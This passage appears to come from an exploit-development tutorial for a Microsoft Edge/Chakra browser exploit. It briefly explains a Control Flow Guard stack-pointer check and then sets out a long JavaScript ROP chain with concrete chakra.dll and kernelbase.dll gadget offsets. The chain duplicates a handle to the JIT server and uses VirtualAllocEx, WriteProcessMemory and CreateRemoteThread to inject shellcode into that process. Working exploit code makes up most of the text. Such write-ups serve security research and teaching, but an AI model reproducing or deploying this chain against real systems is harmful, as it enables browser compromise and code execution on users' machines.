When SetThreadContext is called, it performs a syscall into the kernel (via NtSetContextThread). In the kernel, this eventually reaches the kernel version of NtSetContextThread, which calls PspSetContextThreadInternal.

PspSetContextThreadInternal eventually calls KeVerifyContextRecord, which in turn eventually calls a function called RtlGuardIsValidStackPointer.

This feature of CFG checks the TEB to ensure that the stack pointer supplied to any SetThreadContext call falls within the known bounds of the stack (the stack base and limit) managed by the TEB. This is why we cannot change RSP to something like our VirtualAllocEx allocation - as it isn’t within the known stack bounds. Because of this, we have to directly write our ROP payload to the existing stack (which we leaked via GetThreadContext).
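
To make the idea concrete, here is a deliberately simplified model of a stack-bounds check. It is not the actual logic of RtlGuardIsValidStackPointer (which I am not reproducing here); the function name `isPlausibleStackPointer` and every address below are invented for illustration. It only shows why a leaked stack address passes while a fresh heap-style allocation would not:

```javascript
// Simplified model of a stack-bounds check; NOT the real kernel implementation
// stackLimit is the lowest valid stack address, stackBase the highest
function isPlausibleStackPointer(rsp, stackLimit, stackBase) {
    return rsp >= stackLimit && rsp < stackBase;
}

// Made-up values for illustration only
const stackLimit = 0x000000a000100000n;
const stackBase  = 0x000000a000200000n;
const leakedRsp  = 0x000000a0001ff000n;  // e.g. a value read out of CONTEXT.Rsp
const remoteAlloc = 0x000001f000000000n; // e.g. a VirtualAllocEx allocation

console.log(isPlausibleStackPointer(leakedRsp, stackLimit, stackBase));   // within the stack range
console.log(isPlausibleStackPointer(remoteAlloc, stackLimit, stackBase)); // outside the stack range
```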

With that said, let’s see our last WriteProcessMemory call. Here is how the call will be set up:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain),				// Size of our ROP chain
	NULL 						// Optional
);
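
Since WriteProcessMemory takes five arguments, the fifth one has to live on the stack rather than in a register. The sketch below models the qwords that every API call in this exploit places after its `jmp rax` gadget: a fake return address, four qwords of shadow space, and up to three stack arguments, all of which the `add rsp, 0x38 ; ret` gadget then skips over. The `buildCallTail` helper is hypothetical (the exploit itself writes each qword by hand with write64 and next), and the gadget address is just the unrebased one from the comments:

```javascript
// Hypothetical helper: build the qwords that follow the "jmp rax" into an API
// returnGadget: address of an "add rsp, 0x38 ; ret" gadget
// stackArgs: arguments 5, 6 and 7 (at most three fit under add rsp, 0x38)
function buildCallTail(returnGadget, stackArgs) {
    const PAD = 0x4141414141414141n;
    if (stackArgs.length > 3) {
        throw new Error("add rsp, 0x38 only covers three stack arguments");
    }
    const tail = [returnGadget];            // fake return address at RSP+0x00 on entry
    for (let i = 0; i < 4; i++) {
        tail.push(PAD);                     // shadow space, RSP+0x08 .. RSP+0x20
    }
    for (let i = 0; i < 3; i++) {
        // Stack arguments at RSP+0x28 .. RSP+0x38, padded when unused
        tail.push(i < stackArgs.length ? stackArgs[i] : PAD);
    }
    return tail;
}

// WriteProcessMemory: one stack argument, lpNumberOfBytesWritten = NULL
const tail = buildCallTail(0x180243949n, [0n]);
tail.forEach((q, i) => console.log("RSP+0x" + (i * 8).toString(16) + ": 0x" + q.toString(16)));
```

The same layout covers CreateRemoteThread, which simply fills all three stack slots (lpParameter, dwCreationFlags, lpThreadId) instead of padding two of them.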
// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38) (DUPLICATE_SAME_ACCESS)
next();

// VirtualAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return value (the address of the new allocation) in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for the gadget below, which reads from the address at a +0x8 offset)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);      // 0x18028b4fe: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the thread HANDLE for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address, which points to the value we want to write: the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
